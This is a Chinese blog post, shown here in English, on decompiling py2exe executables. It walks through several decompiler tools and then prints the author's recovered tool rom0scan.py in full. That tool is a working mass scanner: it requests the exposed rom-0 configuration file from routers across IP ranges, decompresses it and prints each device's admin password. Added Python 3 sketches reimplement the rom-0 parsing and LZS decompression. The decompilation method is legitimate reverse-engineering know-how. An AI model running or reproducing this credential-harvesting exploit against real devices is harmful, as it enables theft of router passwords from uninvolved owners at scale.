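Title: MISC Series (41) -- Decompiling EXE Files Generated by py2exe
Created: 2015-04-30 14:28 Updated: 2015-04-30 17:28 Link: https://scz.617.cn/python/201504301428.txt
Contents:
☆ Background
☆ unpy2exe.py + uncompyle2
☆ Py2ExeDumper.exe + GetPyc.py + EasyPythonDecompiler.exe
☆ Some tools that failed
☆ rom0scan.py (decompilation result)
☆ Comments on the decompilation quality
☆ A few superfluous words
☆ References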
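☆ Background
See:
"DNS Series (9) -- GFW Interference with DNS" (DNS_2.txt)
It compares four tools for converting Python to EXE.
See:
rom0scan(20150422).7z http://pan.baidu.com/s/1eQs51YE (archive password: rom0scan.exe)
GetHttpsInfo(20150422).7z http://pan.baidu.com/s/1c0ewyHU (archive password: GetHttpsInfo.exe)
"A Programmer's Snippets (2) -- How rom0scan.exe Came About" https://scz.617.cn/python/201504171139.txt
In that article I wrote:
rom0scan.exe is the py2exe build of rom0scan.py. I am a loyal Windows user; I like portable ("green") Windows programs and believe plenty of other people do too. I wrote this tool to study other vulnerabilities, and it already covers my original needs. Like superdns.exe and GetHttpsInfo.exe, it is a small tool I use myself. Programmers write helper tools to free themselves from heavy manual labor; why else would people say that laziness is one of the driving forces of progress and of human evolution?
I share these EXEs not for people who can build from source, but for novice users and fans of portable Windows programs. If you can build from source, fend for yourselves; the wide world awaits you.
In the usage notes for GetHttpsInfo.exe I wrote:
If VirusTotal flags it and you worry that I will make off with your private videos, do not use it; if they get taken, you asked for it.
No obfuscation or anti-decompilation measures were applied, purely out of an "overflowing of love". I am the kind of universal-love person who thinks of non-professionals and novices, and I care a great deal that anyone who can use the tool gets peace and convenience. Having to install other dependencies would hardly fit that aesthetic.
So, the background in short: I shared some handy small tools on Baidu Netdisk as EXEs. They are all written in Python; for the novices' convenience, and even more for my own, I ran them through py2exe before sharing. Since keeping the implementation secret was never my aim, I applied no obfuscation or anti-decompilation measures. To an insider (内行人; keep the 行, because without it you get 内人, "wife", which would not do), these EXEs are the Python source code. A while ago a friend asked me on Sina Weibo whether I could provide the source. I smiled and said nothing; note this sentence:
If you can build from source, fend for yourselves.
With May Day (International Workers' Day) approaching, this model worker will play the good guy once more and show the onlookers, who are impressed without knowing why, what "these EXEs are the Python source code" means.
After watching, those with money may chip in money and those without may simply cheer; and, by the way, I am looking for one 第一会所 invitation code.
Below, taking rom0scan.exe as the example, I describe how to decompile an EXE generated by py2exe and recover the source code.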
☆ unpy2exe.py + uncompyle2
$ unpy2exe.py -o rom0scan rom0scan.exe
This generates "rom0scan\rom0scan.py.pyc".
Usage: uncompyle2 [OPTIONS]... [ FILE | DIR]...
Examples:
  uncompyle2      foo.pyc bar.pyc       # decompile foo.pyc, bar.pyc to stdout
  uncompyle2 -o . foo.pyc bar.pyc       # decompile to ./foo.pyc_dis and ./bar.pyc_dis
  uncompyle2 -o /tmp /usr/lib/python1.5 # decompile whole library
Options:
  -o
Debugging Options:
  --showasm -a  include byte-code (disables --verify)
  --showast -t  include AST (abstract syntax tree) (disables --verify)
Extensions of generated files:
  '.pyc_dis' '.pyo_dis'   successfully decompiled (and verified if --verify)
    + '_unverified'       successfully decompile but --verify failed
    + '_failed'           decompile failed (contact author for enhancement)
Running uncompyle2 on that .pyc generates "rom0scan\rom0scan.py.pyc_dis", which is the original rom0scan.py.
☆ Py2ExeDumper.exe + GetPyc.py + EasyPythonDecompiler.exe
$ Py2ExeDumper.exe rom0scan.exe
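This generates the following in the current directory:
library.zip
PYTHONSCRIPT
Note that PYTHONSCRIPT is a binary file; it is not yet a .pyc file, let alone a .py file. It starts with a variable-length header, usually 0x11 bytes. Open PYTHONSCRIPT in WinHex and look at it to get a feel for the layout.
Edit GetPyc.py as follows: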
#!/usr/bin/env python
# -*- encoding: utf-8 -*-

#
# Note that you have to run the script in the same version of python which
# was used to generate the exe. Otherwise unmarshalling will fail.
#

import marshal, imp

f = open( 'PYTHONSCRIPT', 'rb' )

#
# struct Header
# {
#     unsigned int    tag;
#     unsigned int    optimize;
#     unsigned int    unbuffered;
#     unsigned int    data_bytes;
#     unsigned char   zippath[VARIABLE_SIZE];
# };
#
# Skip the header, you have to know the header size beforehand.
#
f.seek( 0x11 )
ob = marshal.load( f )

for i in xrange( 0, len( ob ) ) :
    open( str( i ) + '.pyc', 'wb' ).write( imp.get_magic() + '\0' * 4 + marshal.dumps( ob[i] ) )

f.close()
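The hard-coded 0x11 only holds when zippath is empty (16 bytes of integers plus one NUL). As a minimal sketch, and not part of GetPyc.py, the offset can be computed instead. It assumes the four integers are little-endian 32-bit values and that zippath is NUL-terminated; the function name parse_pythonscript_header is made up for illustration, and the sketch is written for Python 3 even though the marshalled payload itself must still be loaded by the Python version that built the EXE.

```python
import struct

# Assumption: four little-endian unsigned 32-bit fields, in the order
# given by the Header struct: tag, optimize, unbuffered, data_bytes.
FIXED_FIELDS = struct.Struct("<4I")


def parse_pythonscript_header(blob):
    """Return (fields, zippath, payload_offset) for a PYTHONSCRIPT blob."""
    tag, optimize, unbuffered, data_bytes = FIXED_FIELDS.unpack_from(blob, 0)
    # Assumption: zippath is a NUL-terminated string right after the integers.
    nul = blob.index(b"\x00", FIXED_FIELDS.size)
    zippath = blob[FIXED_FIELDS.size:nul]
    fields = {
        "tag": tag,
        "optimize": optimize,
        "unbuffered": unbuffered,
        "data_bytes": data_bytes,
    }
    # The marshalled list of code objects starts right after the NUL.
    return fields, zippath, nul + 1
```

The returned payload_offset is the value to pass to f.seek() in place of 0x11.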
$ GetPyc.py
This generates the following in the current directory:
0.pyc 1.pyc 2.pyc
Judging by size alone, 2.pyc (the largest) corresponds to the original rom0scan.pyc.
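Size is a heuristic. Each marshalled code object also carries its source file name in co_filename (the decompiler prints it as "Embedded file name"), which identifies the script directly. The sketch below is a Python 3 analogue of the write loop in GetPyc.py, not a drop-in replacement: Python 2 uses an 8-byte .pyc header (magic plus 4-byte timestamp), whereas Python 3.7+ uses 16 bytes. The function name code_objects_to_pyc is hypothetical.

```python
import importlib.util
import marshal
import struct


def code_objects_to_pyc(code_objects):
    """Return a list of (co_filename, pyc_bytes), one per code object."""
    # Python 3.7+ header: magic, flags (0 = timestamp-based),
    # source mtime and source size (both left as 0 here).
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, 0, 0)
    return [(co.co_filename, header + marshal.dumps(co)) for co in code_objects]


if __name__ == "__main__":
    # Stand-ins for the list that marshal.load() returns from PYTHONSCRIPT.
    demo = [
        compile("pass", "boot_common.py", "exec"),
        compile("answer = 6 * 7", "rom0scan.py", "exec"),
    ]
    for index, (name, pyc) in enumerate(code_objects_to_pyc(demo)):
        print("%d.pyc <- %s (%d bytes)" % (index, name, len(pyc)))
```

Printing the names next to the indexes shows which N.pyc came from which script without comparing file sizes.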
Double-click EasyPythonDecompiler.exe ([2]), a GUI program, and choose 2.pyc to decompile. It writes 2.pyc_dis to the directory containing 2.pyc; this is the original rom0scan.py.
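☆ Some tools that failed
py2exe-extract ([3]) is meant to extract the resource (PYTHONSCRIPT) from the .exe and then extract the .pyc files from it. Its implementation is not robust enough, though; read the source to understand the principle and leave it at that.
pyREtic ([4]) was written by someone who used to work at Immunity, and it was presented at BlackHat 2010. See "docs\HOWTO.md"; in theory it should be able to recover .py from .pyc.
$ REpdb.py
(REpdb:default) set_project rom0scan
(REpdb:rom0scan) gen_ref
(REpdb:rom0scan) gen_obf C:/Python27/Lib/site-packages
(REpdb:rom0scan) remap
(REpdb:rom0scan) swap_opcodes
(REpdb:rom0scan) quit
$ REpdb.py
(REpdb:default) set_project rom0scan
(REpdb:rom0scan) fs_um_decompile
Under normal circumstances this should generate:
However, it seems not to have been updated for a long time; in any case I could not get it to work here.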
☆ rom0scan.py (decompilation result)
# Embedded file name: rom0scan.py
import sys, string, getopt, os, struct, socket, random, inspect, re
import pycurl, Queue, itertools, collections
from threading import Thread, RLock
from cStringIO import StringIO

class MyException(Exception):

    def __init__(self, value = None):
        self.value = value

    def __str__(self):
        return str(self.value)

    def __repr__(self):
        return repr(self.value)

def itos32(num):
    return struct.pack('=I', int(num & 4294967295L))

def uint16(num):
    return int(struct.unpack('=H', struct.pack('=H', int(num & 65535)))[0])

def uint32(num):
    return int(struct.unpack('=I', struct.pack('=I', int(num & 4294967295L)))[0])

def readb16(buf, index):
    if index < 0:
        index += len(buf)
    return int(struct.unpack('>H', buf[index:index + 2])[0])

def readstr(buf, index):
    if index < 0:
        index += len(buf)
    return buf[index:].split('\x00')[0]

def resolvehost(host):
    try:
        ret = uint32(int(struct.unpack('>I', socket.inet_aton(socket.gethostbyname(host)))[0]))
    except:
        ret = 0

    return ret

def dosomething(str):
    str += '\x00'
    xxx = ''
    i = 0
    while i < len(str) - 1:
        if '\\' != str[i]:
            xxx += str[i]
        elif i + 1 >= len(str):
            xxx += str[i]
        elif '\\' == str[i + 1]:
            xxx += '\\'
            i += 1
        elif 'r' == str[i + 1]:
            xxx += '\r'
            i += 1
        elif 'n' == str[i + 1]:
            xxx += '\n'
            i += 1
        elif 't' == str[i + 1]:
            xxx += '\t'
            i += 1
        elif '0' == str[i + 1]:
            xxx += '\x00'
            i += 1
        elif 'x' == str[i + 1]:
            if str[i + 2] >= '0' and str[i + 2] <= '9' or str[i + 2] >= 'a' and str[i + 2] <= 'f' or str[i + 2] >= 'A' and str[i + 2] <= 'F':
                i += 2
                tmp = str[i]
                if str[i + 1] >= '0' and str[i + 1] <= '9' or str[i + 1] >= 'a' and str[i + 1] <= 'f' or str[i + 1] >= 'A' and str[i + 1] <= 'F':
                    i += 1
                    tmp += str[i]
                else:
                    tmp = '0' + tmp
                xxx += tmp.decode('hex_codec')
            else:
                xxx += str[i]
        else:
            xxx += str[i]
        i += 1

    return xxx

def AnyToSth(src, dst = 'utf_8'):
    codelist = ['utf_8', 'gb2312', 'gbk', 'gb18030', 'big5', 'latin_1']
    ret = '(error)'
    for c in codelist:
        try:
            ret = src.decode(c).encode(dst)
            break
        except UnicodeDecodeError:
            pass
        except UnicodeEncodeError:
            pass

    return ret

class BitReader():

    def __init__(self, bytes):
        self.__bits__ = collections.deque()
        for byte in bytes:
            byte = ord(byte)
            for i in xrange(8):
                self.__bits__.append(byte >> 7 - i & 1)

    def getBit(self):
        return self.__bits__.popleft()

    def getBits(self, num):
        ret = 0
        for i in xrange(num):
            ret += self.getBit() << num - 1 - i

        return ret

    def getLength(self):
        length = 2
        while True:
            i = self.getBits(2)
            length += i
            if not (3 == i and length < 8):
                break

        if 8 == length:
            while True:
                i = self.getBits(4)
                length += i
                if 15 != i:
                    break

        return length

def LZSDecompress(data):
    reader = BitReader(data)
    result = ''
    while True:
        bit = reader.getBit()
        if not bit:
            byte = reader.getBits(8)
            result += chr(byte)
            continue
        bit = reader.getBit()
        if 1 == bit:
            offset = reader.getBits(7)
        else:
            offset = reader.getBits(11)
        if 1 == bit and 0 == offset:
            break
        if offset > len(result):
            break
        length = reader.getLength()
        for i in xrange(length):
            result += result[-offset]

    return result

QueueInWorkerExit = False

class QueueInWorker(Thread):

    def __init__(self, queue_in, queue_out, httpheader = [], proxypool = [], noproxy = 'localhost,127.0.0.1', referer = '', followlocation = 1, maxredirs = 5, redir_protocols = 3, protocols = 3, connecttimeout = 30, timeout = 30, connect_max = 16, monitor = False, port = None):
        super(QueueInWorker, self).__init__()
        self.queue_in = queue_in
        self.queue_out = queue_out
        self.httpheader = httpheader
        self.proxypool = proxypool
        self.noproxy = noproxy
        self.referer = referer
        self.followlocation = followlocation
        self.maxredirs = maxredirs
        self.redir_protocols = redir_protocols
        self.protocols = protocols
        self.connecttimeout = connecttimeout
        self.timeout = timeout
        self.connect_max = connect_max
        self.monitor = monitor
        self.port = port
        self.m = pycurl.CurlMulti()
        self.m.cpool = []
        self.setDaemon(True)

    def __del__(self):
        if self.m is not None:
            for c in self.m.cpool:
                if c.host is not None:
                    c.host = None
                if c.head is not None:
                    c.head.close()
                    c.head = None
                if c.body is not None:
                    c.body.close()
                    c.body = None
                self.m.remove_handle(c)
                self.m.cpool.remove(c)
                c.close()

            self.m.cpool = []
            self.m.close()
            self.m = None
        return

    def c_init(self, c):
        c.setopt(pycurl.HTTPHEADER, self.httpheader)
        if len(self.proxypool) > 0:
            c.setopt(pycurl.PROXY, random.choice(self.proxypool))
            c.setopt(pycurl.NOPROXY, self.noproxy)
        if self.referer is None:
            c.setopt(pycurl.AUTOREFERER, 0)
        elif '' == self.referer:
            c.setopt(pycurl.AUTOREFERER, 1)
        else:
            c.setopt(pycurl.REFERER, self.referer)
        c.setopt(pycurl.FOLLOWLOCATION, self.followlocation)
        c.setopt(pycurl.MAXREDIRS, self.maxredirs)
        c.setopt(pycurl.REDIR_PROTOCOLS, self.redir_protocols)
        c.setopt(pycurl.PROTOCOLS, self.protocols)
        c.setopt(pycurl.NOSIGNAL, 1)
        c.setopt(pycurl.CONNECTTIMEOUT, self.connecttimeout)
        c.setopt(pycurl.TIMEOUT, self.timeout)
        c.setopt(pycurl.ENCODING, '')
        if self.port is not None:
            c.setopt(pycurl.PORT, self.port)
        return

    def run(self):
        global QueueInWorkerExit
        random.seed()
        while True:
            num = len(self.m.cpool)
            if not QueueInWorkerExit and num < self.connect_max:
                num = self.connect_max - num
                for i in xrange(num):
                    try:
                        host = self.queue_in.get(True, 1)
                        if host is None:
                            QueueInWorkerExit = True
                            break
                        else:
                            if self.monitor:
                                sys.stderr.write('%40s\r%s\r' % (' ', host))
                            c = pycurl.Curl()
                            self.c_init(c)
                            c.host = host
                            c.setopt(pycurl.URL, 'http://%s/rom-0' % host)
                            c.head = StringIO()
                            c.setopt(pycurl.HEADERFUNCTION, c.head.write)
                            c.body = StringIO()
                            c.setopt(pycurl.WRITEFUNCTION, c.body.write)
                            self.m.cpool.append(c)
                            self.m.add_handle(c)
                    except Queue.Empty:
                        break

            num = len(self.m.cpool)
            if 0 == num:
                if QueueInWorkerExit:
                    self.queue_out.put(None)
                    break
                else:
                    continue
            while True:
                ret, num_ret = self.m.perform()
                if pycurl.E_CALL_MULTI_PERFORM != ret:
                    break

            while True:
                num_ret, ok_list, error_list = self.m.info_read()
                for c in ok_list:
                    head = AnyToSth(c.head.getvalue())
                    if '(error)' == head:
                        server = '(error)'
                    else:
                        try:
                            server = re.search('Server: ([^\\r\\n]+)', head, re.U).group(1)
                            server = AnyToSth(server, 'gbk')
                        except AttributeError:
                            server = None

                    code = c.getinfo(pycurl.HTTP_CODE)
                    password = None
                    if 200 == code:
                        buf = c.body.getvalue()
                        end = len(buf)
                        index = 8192
                        while index + 20 <= end:
                            name = readstr(buf, index + 6)
                            if 'autoexec.net' == name:
                                offset = readb16(buf, index + 4) + 12 + 4
                                size = readb16(buf, index + 2) - 12 - 4
                                if 8192 + offset > end or 8192 + offset + size > end:
                                    break
                                data = LZSDecompress(buf[8192 + offset:8192 + offset + size])
                                if len(data) > 20:
                                    password = readstr(data, 20)
                                break
                            index += 20

                    self.queue_out.put((c.host,
                                        code,
                                        server,
                                        password))
                    c.host = None
                    c.head.close()
                    c.head = None
                    c.body.close()
                    c.body = None
                    self.m.remove_handle(c)
                    self.m.cpool.remove(c)
                    c.close()

                for c, errno, errmsg in error_list:
                    c.host = None
                    c.head.close()
                    c.head = None
                    c.body.close()
                    c.body = None
                    self.m.remove_handle(c)
                    self.m.cpool.remove(c)
                    c.close()

                if 0 == num_ret:
                    break

            self.m.select(1.0)

        return

QueueTmpWorkerExit = False
QueueTmpNoneNum = 0
QueueTmpRLock = RLock()

class QueueTmpWorker(Thread):

    def __init__(self, queue_in, queue_out, num_fetch, httpheader = [], proxypool = [], noproxy = 'localhost,127.0.0.1', referer = '', followlocation = 1, maxredirs = 5, redir_protocols = 3, protocols = 3, connecttimeout = 30, timeout = 30, connect_max = 16, port = None):
        super(QueueTmpWorker, self).__init__()
        self.queue_in = queue_in
        self.queue_out = queue_out
        self.num_fetch = num_fetch
        self.httpheader = httpheader
        self.proxypool = proxypool
        self.noproxy = noproxy
        self.referer = referer
        self.followlocation = followlocation
        self.maxredirs = maxredirs
        self.redir_protocols = redir_protocols
        self.protocols = protocols
        self.connecttimeout = connecttimeout
        self.timeout = timeout
        self.connect_max = connect_max
        self.port = port
        self.m = pycurl.CurlMulti()
        self.m.cpool = []
        self.setDaemon(True)

    def __del__(self):
        if self.m is not None:
            for c in self.m.cpool:
                if c.data is not None:
                    c.data = None
                if c.head is not None:
                    c.head.close()
                    c.head = None
                if c.body is not None:
                    c.body.close()
                    c.body = None
                self.m.remove_handle(c)
                self.m.cpool.remove(c)
                c.close()

            self.m.cpool = []
            self.m.close()
            self.m = None
        return

    def c_init(self, c):
        c.setopt(pycurl.HTTPHEADER, self.httpheader)
        if len(self.proxypool) > 0:
            c.setopt(pycurl.PROXY, random.choice(self.proxypool))
            c.setopt(pycurl.NOPROXY, self.noproxy)
        if self.referer is None:
            c.setopt(pycurl.AUTOREFERER, 0)
        elif '' == self.referer:
            c.setopt(pycurl.AUTOREFERER, 1)
        else:
            c.setopt(pycurl.REFERER, self.referer)
        c.setopt(pycurl.FOLLOWLOCATION, self.followlocation)
        c.setopt(pycurl.MAXREDIRS, self.maxredirs)
        c.setopt(pycurl.REDIR_PROTOCOLS, self.redir_protocols)
        c.setopt(pycurl.PROTOCOLS, self.protocols)
        c.setopt(pycurl.NOSIGNAL, 1)
        c.setopt(pycurl.CONNECTTIMEOUT, self.connecttimeout)
        c.setopt(pycurl.TIMEOUT, self.timeout)
        c.setopt(pycurl.ENCODING, '')
        if self.port is not None:
            c.setopt(pycurl.PORT, self.port)
        return

    def run(self):
        global QueueTmpWorkerExit
        global QueueTmpNoneNum
        random.seed()
        while True:
            num = len(self.m.cpool)
            if not QueueTmpWorkerExit and num < self.connect_max:
                num = self.connect_max - num
                for i in xrange(num):
                    try:
                        data = self.queue_in.get(True, 1)
                        if data is None:
                            QueueTmpRLock.acquire()
                            QueueTmpNoneNum += 1
                            QueueTmpRLock.release()
                            if self.num_fetch == QueueTmpNoneNum:
                                QueueTmpWorkerExit = True
                                break
                        else:
                            c = pycurl.Curl()
                            self.c_init(c)
                            c.data = data
                            c.setopt(pycurl.URL, 'http://%s/' % data[0])
                            c.head = StringIO()
                            c.setopt(pycurl.HEADERFUNCTION, c.head.write)
                            c.body = StringIO()
                            c.setopt(pycurl.WRITEFUNCTION, c.body.write)
                            c.setopt(pycurl.CUSTOMREQUEST, 'HEAD')
                            c.setopt(pycurl.NOBODY, True)
                            self.m.cpool.append(c)
                            self.m.add_handle(c)
                    except Queue.Empty:
                        break

            num = len(self.m.cpool)
            if 0 == num:
                if QueueTmpWorkerExit:
                    self.queue_out.put(None)
                    break
                else:
                    continue
            while True:
                ret, num_ret = self.m.perform()
                if pycurl.E_CALL_MULTI_PERFORM != ret:
                    break

            while True:
                num_ret, ok_list, error_list = self.m.info_read()
                for c in ok_list:
                    code = c.getinfo(pycurl.HTTP_CODE)
                    if 401 == code:
                        head = AnyToSth(c.head.getvalue())
                        if '(error)' == head:
                            model = '(error)'
                        else:
                            try:
                                model = re.search('WWW-Authenticate: Basic realm="(.+?)"', c.head.getvalue(), re.U).group(1)
                                model = AnyToSth(model, 'gbk')
                            except AttributeError:
                                model = None

                    else:
                        model = '(%u)' % code
                    self.queue_out.put((c.data[0],
                                        c.data[1],
                                        c.data[2],
                                        c.data[3],
                                        model))
                    c.data = None
                    c.head.close()
                    c.head = None
                    c.body.close()
                    c.body = None
                    self.m.remove_handle(c)
                    self.m.cpool.remove(c)
                    c.close()

                for c, errno, errmsg in error_list:
                    model = '(%u:%s)' % (errno, errmsg)
                    self.queue_out.put((c.data[0],
                                        c.data[1],
                                        c.data[2],
                                        c.data[3],
                                        model))
                    c.data = None
                    c.head.close()
                    c.head = None
                    c.body.close()
                    c.body = None
                    self.m.remove_handle(c)
                    self.m.cpool.remove(c)
                    c.close()

                if 0 == num_ret:
                    break

            self.m.select(1.0)

        return

class QueueOutWorker(Thread):

    def __init__(self, queue_in, num_fetch, quiet = False):
        super(QueueOutWorker, self).__init__()
        self.queue_in = queue_in
        self.num_fetch = num_fetch
        self.quiet = quiet
        self.setDaemon(True)

    def __del__(self):
        pass

    def run(self):
        num_none = 0
        while True:
            data = self.queue_in.get()
            if data is None:
                num_none += 1
                if self.num_fetch == num_none:
                    break
            else:
                host = data[0]
                code = data[1]
                server = data[2]
                password = data[3]
                model = data[4]
                if server is None:
                    server = ''
                if password is None:
                    password = ''
                if model is None:
                    model = ''
                try:
                    if self.quiet:
                        if '' != password:
                            sys.stdout.write('%-15s [%s] [%s]\n' % (socket.gethostbyname(host), model, password))
                    else:
                        sys.stdout.write('%-15s [%u] [%s] [%s] [%s]\n' % (socket.gethostbyname(host),
                                                                         code,
                                                                         server,
                                                                         model,
                                                                         password))
                except socket.gaierror:
                    pass

        return

def main(prog, args):
    from msvcrt import setmode
    setmode(0, os.O_BINARY)
    setmode(1, os.O_BINARY)
    setmode(2, os.O_BINARY)

    def usage(prog):
        sys.stderr.write('Usage: ' + prog + ' [-h|--help] [-v] [-q] [-m] [-b begin] [-e end] [--port port]\n' + '       [--head head] [-s second] [-c connectnum] [-t threadnum] [infile|-]\n')
        raise SystemExit

    try:
        opts, args = getopt.getopt(args, 'hvb:c:e:mqs:t:', ['help', 'head=', 'port='])
    except getopt.GetoptError:
        usage(prog)

    if 0 == len(opts) and 0 == len(args):
        usage(prog)
    second = 30
    threadnum = 8
    connectnum = 16
    begin = 0
    end = 0
    monitor = False
    quiet = False
    port = None
    head = None
    try:
        for x, y in opts:
            if x in ('-h', '--help'):
                usage(prog)
            elif '-v' == x:
                sys.stdout.write('%s ver 2015-04-22 11:22\n' % prog)
                sys.exit(0)
            elif '-b' == x:
                begin = resolvehost(y)
            elif '-c' == x:
                try:
                    connectnum = uint32(int(y, 0))
                except ValueError:
                    raise MyException('Line[%u]: ValueError : Checking your [-c connectnum]' % sys.exc_info()[2].tb_lineno)
            elif '-e' == x:
                end = resolvehost(y)
            elif '--head' == x:
                head = dosomething(y)
            elif '-m' == x:
                monitor = True
            elif '--port' == x:
                port = uint16(int(y, 0))
            elif '-q' == x:
                quiet = True
            elif '-s' == x:
                try:
                    second = uint32(int(y, 0))
                except ValueError:
                    raise MyException('Line[%u]: ValueError : Checking your [-s second]' % sys.exc_info()[2].tb_lineno)
            elif '-t' == x:
                try:
                    threadnum = uint32(int(y, 0))
                except ValueError:
                    raise MyException('Line[%u]: ValueError : Checking your [-t threadnum]' % sys.exc_info()[2].tb_lineno)
            else:
                usage(prog)

        if 0 == second:
            raise MyException('Line[%u]: Checking your [-s second]' % inspect.currentframe().f_lineno)
        if not 0 < connectnum * threadnum <= 256:
            raise MyException('Line[%u]: invalid number of concurrent connections' % inspect.currentframe().f_lineno)
        if 0 == port:
            raise MyException('Line[%u]: Checking your [-p port]' % inspect.currentframe().f_lineno)
        if 0 == begin and 0 == len(args):
            raise MyException('Line[%u]: Checking your [-b begin]' % inspect.currentframe().f_lineno)
        if 0 == end:
            end = begin + 1
        else:
            end = end + 1
        httpheader = ['User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)', 'Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*']
        if head is not None:
            httpheader += [ h.strip() for h in head.split('\n') ]
        queue_in = Queue.Queue(1024)
        queue_tmp = Queue.Queue(1024)
        queue_out = Queue.Queue(4096)
        for i in xrange(threadnum):
            QueueInWorker(queue_in, queue_tmp, httpheader=httpheader, connect_max=connectnum, connecttimeout=second, timeout=second, monitor=monitor, port=port, proxypool=[]).start()
            QueueTmpWorker(queue_tmp, queue_out, num_fetch=threadnum, httpheader=httpheader, connect_max=connectnum, connecttimeout=second, timeout=second, port=port, proxypool=[]).start()

        qoworker = QueueOutWorker(queue_out, threadnum, quiet)
        qoworker.start()
        if len(args) > 0:
            if '-' == args[0]:
                while True:
                    try:
                        target = string.strip(raw_input())
                        queue_in.put(target)
                    except EOFError as e:
                        queue_in.put(None)
                        break

            else:
                try:
                    infile = open(args[0], 'r')
                except IOError as e:
                    raise MyException('Line[%u]: IOError : %s' % (sys.exc_info()[2].tb_lineno, str(e)))

                for target in infile:
                    target = string.strip(target)
                    queue_in.put(target)

                infile.close()
                queue_in.put(None)
        else:
            for ip in itertools.islice(itertools.count(begin), end - begin):
                tail = ip & 255
                if not tail or 255 == tail:
                    continue
                queue_in.put(socket.inet_ntoa(itos32(socket.ntohl(ip))))

            queue_in.put(None)
        qoworker.join()
    except MyException as e:
        sys.stderr.write('%s\n' % e.value)
        raise SystemExit

    return

if '__main__' == __name__:
    try:
        main(os.path.basename(sys.argv[0]), sys.argv[1:])
    except KeyboardInterrupt:
        pass
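The rom-0 parsing is buried inside QueueInWorker.run(), so here it is pulled out as a stand-alone Python 3 sketch. It mirrors what the listing does and nothing more: scan 20-byte directory entries from offset 8192, read a big-endian size at +2 and offset at +4, compare the NUL-terminated name at +6, then slice out the stored data. The function name find_rom0_entry and the constants are hypothetical, and the field meanings are inferred from the listing alone.

```python
import struct

DIR_BASE = 8192    # where the listing starts scanning
ENTRY_SIZE = 20    # the listing advances by 20 bytes per entry
SKIP = 12 + 4      # the listing adds 12 + 4 to the offset and subtracts it from the size


def find_rom0_entry(buf, wanted=b"autoexec.net"):
    """Return the stored (still LZS-compressed) bytes of `wanted`, or None."""
    index = DIR_BASE
    while index + ENTRY_SIZE <= len(buf):
        size, offset = struct.unpack_from(">HH", buf, index + 2)
        # Unlike readstr() in the listing, the name is bounded to the entry.
        name = buf[index + 6:index + ENTRY_SIZE].split(b"\x00")[0]
        if name == wanted:
            start = DIR_BASE + offset + SKIP
            stop = start + size - SKIP
            if stop < start or stop > len(buf):
                return None
            return bytes(buf[start:stop])
        index += ENTRY_SIZE
    return None
```

In the listing, the returned bytes go through LZSDecompress() and the password is the NUL-terminated string at offset 20 of the decompressed data.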
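☆ Comments on the decompilation quality
The decompilation result above is already very faithful, apart from my own perverse (BT) coding style, which in principle cannot be recovered. The style the decompiler emits can only be described as syntactically valid Python.
In "A Programmer's Snippets (2) -- How rom0scan.exe Came About" I wrote:
It is almost certain that the Python LZS decompression code has some small bugs. Sometimes its output is wrong, yet because the password-extraction logic tolerates some errors, extraction succeeds for some rom-0 files while for others it yields extra invalid data. Filippo Valsorda's code has clearly not been widely tested and has never been updated. I tried emailing him to report the bug and got no reply. With no other option, I read up on the LZS algorithm myself:
Lempel Ziv Stac (LZS) http://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Stac
I did not analyze Filippo Valsorda's code closely, but several places looked unreliable:
1) The logic that handles the encoded length is not clear. Judging from the comparison test cases mentioned earlier, the bug is most likely in reading the length.
2) Why does BitReader.__init__() cast with bool()? It is entirely unnecessary.
3) The window parameter of LZSDecompress() does not need to exist, and therefore class RingList does not need to exist either.
In the end I rewrote the Python implementation from the Wikipedia description of LZS and its C implementation. I did not want to patch Filippo Valsorda's code; it is too far from my taste.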
For a correct Python implementation of LZS decompression, see the following in the decompilation result:
class BitReader
def LZSDecompress()
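For readers on Python 3, here is a rough port of those two pieces. It follows the decompiled logic step by step: a 0 bit introduces an 8-bit literal; a 1 bit introduces a back-reference with a 7-bit or 11-bit offset; a 7-bit offset of 0 is the end marker. Two things differ from the listing and are my own changes: it works on bytes instead of str, and it also stops on an 11-bit offset of 0. The snake_case names are mine.

```python
class BitReader:
    """Read bits most-significant-bit first from a bytes object."""

    def __init__(self, data):
        self.data = data
        self.pos = 0  # absolute bit position

    def get_bit(self):
        byte = self.data[self.pos >> 3]  # IndexError once input is exhausted
        bit = (byte >> (7 - (self.pos & 7))) & 1
        self.pos += 1
        return bit

    def get_bits(self, num):
        value = 0
        for _ in range(num):
            value = (value << 1) | self.get_bit()
        return value

    def get_length(self):
        # 2-bit groups encode lengths 2..7; reaching 8 switches to 4-bit
        # groups, where each 15 means "add 15 and keep reading".
        length = 2
        while True:
            i = self.get_bits(2)
            length += i
            if not (i == 3 and length < 8):
                break
        if length == 8:
            while True:
                i = self.get_bits(4)
                length += i
                if i != 15:
                    break
        return length


def lzs_decompress(data):
    reader = BitReader(data)
    result = bytearray()
    while True:
        if not reader.get_bit():
            result.append(reader.get_bits(8))  # literal byte
            continue
        short = reader.get_bit()
        offset = reader.get_bits(7 if short else 11)
        if short and offset == 0:
            break  # end marker
        if offset == 0 or offset > len(result):
            break  # invalid back-reference (the offset == 0 check is my addition)
        for _ in range(reader.get_length()):
            result.append(result[-offset])  # byte-by-byte so runs may overlap
    return bytes(result)
```

Copying one byte at a time matters: a back-reference may be longer than its offset, in which case it re-reads bytes it has just appended.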
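☆ A few superfluous words
To the brothers who once asked for the source code of superdns.exe and GetHttpsInfo.exe: do not say I ignored you.
I really am a kind-hearted person.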
☆ References
[1] Extract .pyc files from executables created with py2exe
    https://github.com/matiasb/unpy2exe
    uncompyle2 converts Python byte-code back into equivalent Python source code
    https://github.com/Mysterie/uncompyle2
[2] Py2ExeDumper is a tool to extract a py2exe generated executable file
    http://sourceforge.net/projects/py2exedumper
    Easy Python Decompiler is python bytecode decompiler, decompiles pyc & pyo files
    http://sourceforge.net/projects/easypythondecompiler
    (binary only, no source code; this is a GUI program)
[3] py2exe-extract
    https://code.google.com/p/py2exe-extract/
[4] pyREtic is an extensible framework for in-memory Python bytecode reverse engineering
    https://github.com/MyNameIsMeerkat/pyREtic